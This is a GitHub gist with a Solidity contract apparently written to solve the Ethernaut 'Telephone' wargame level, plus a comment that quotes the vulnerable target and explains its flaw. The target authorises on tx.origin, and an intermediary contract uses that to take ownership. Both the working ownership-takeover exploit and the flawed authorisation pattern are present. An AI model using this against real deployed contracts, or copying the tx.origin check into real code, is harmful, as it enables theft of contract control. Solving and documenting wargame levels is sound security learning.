Skip to content

Instantly share code, notes, and snippets.

@kiknaio

kiknaio/Telephone.ethernaut.sol

Created August 22, 2023 17:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kiknaio/22b54d089ff20336e67051152d8e4cac to your computer and use it in GitHub Desktop.
Save kiknaio/22b54d089ff20336e67051152d8e4cac to your computer and use it in GitHub Desktop.
Download ZIP
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.8.18+commit.87f61d96.js&optimize=false&runs=200&gist=
Raw
Telephone.ethernaut.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface ITelephone {
function changeOwner(address _owner) external;
}
contract HackTelephoneOnEthernatu {
ITelephone telephoneAddress = ITelephone(0x4536F233885184a92ddF57b6Bc86117A879C0745);
constructor() {
telephoneAddress.changeOwner(0x3D5a7D193f4e454BDb743488B7e70CAd51dEB683);
}
}
@kiknaio
Copy link
Author

kiknaio commented Aug 22, 2023

Used this contract to hack the original contract. Original contract source code was this:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {

  address public owner;

  constructor() {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

It uses tx.origin instead of msg.sender, so phishing contract can impersonate EOA (transaction sender) and do literally everything on a target contract without any additional permission.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment